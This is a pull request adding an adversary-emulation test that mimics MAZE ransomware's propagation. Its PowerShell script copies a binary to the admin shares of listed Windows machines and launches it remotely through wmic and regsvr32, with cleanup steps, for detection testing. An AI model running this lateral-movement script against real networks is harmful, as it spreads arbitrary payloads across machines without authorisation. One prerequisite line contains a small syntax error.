### PR TITLE
Adding T1105 Test 21 - MAZE Propagation

### DIFF
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -553,3 +553,67 @@ atomic_tests:
       del /f/s/q %temp%\T1105 >nul 2>&1
       rmdir /s/q %temp%\T1105 >nul 2>&1
     name: command_prompt
+- name: MAZE Propagation Script
+  description: |
+    This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. 
+    Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
+    Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html 
+  supported_platforms:
+  - windows
+  input_arguments:
+    binary_file:
+      description: Binary file to copy to remote machines
+      type: string
+      default: $env:comspec
+    exe_remote_folder:
+      description: Path to store executable on remote machine (no drive letter)
+      type: String
+      default: \Windows\Temp\T1105.exe
+    remote_drive_letter:
+      description: Remote drive letter
+      type: String
+      default: C
+    machine_list:
+      description: Location of list of machines
+      type: String
+      default: $env:temp\T1105MachineList.txt
+    output_offline_list:
+      description: File to output list of offline hosts to
+      type: String
+      default: $env:temp\T1105OfflineHosts.txt
+    output_completed_list:
+      description: File to output list of hosts that binary was successfully propagated to
+      type: String
+      default: $env:temp\T1105CompletedHosts.txt
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Binary file must exist at specified location (#{binary_file})
+    prereq_command: |
+      if (Test-Path #{binary_file}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      #{binary-file] = $env:comspec
+  - description: |
+      Machine list must exist at specified location (#{machine_list})
+    prereq_command: |
+      if (Test-Path #{machine_list}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      new-item -path "#{machine_list}"
+      echo "A machine list file has been generated at #{machine_list}. Please enter the machines to target there, one machine per line."
+  executor:
+    command: |
+      foreach ($machine in get-content -path "#{machine_list}")
+      {if (test-connection -Count 1 -computername $machine -quiet) 
+      {cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
+      echo $machine >> "#{output_completed_list}"
+      wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
+      else
+      {echo $machine >> "#{output_offline_list}"}}
+    cleanup_command: |
+      if (test-path #{output_completed_list}) 
+      {foreach ($machine in get-content -path "#{output_completed_list}")
+      {wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
+      Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
+      Remove-Item -path "#{output_completed_list}" -erroraction silentlycontinue
+      Remove-item -path "#{output_offline_list}" -erroraction silentlycontinue
+    name: powershell


### PR DESCRIPTION
**Details:**
This test simulates the propagation function utilized by MAZE ransomware in order to test connectivity to a list of machines, copy a binary to the ones found to be online, and then use regsvr32 to register the copied binary. Upon successful execution of this test with the default options, cmd.exe will be copied to a remote machine and wmic will be used to call the regsvr32 process to register the binary. Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents

**Testing:**
Tested on 3 Windows 10 machines.
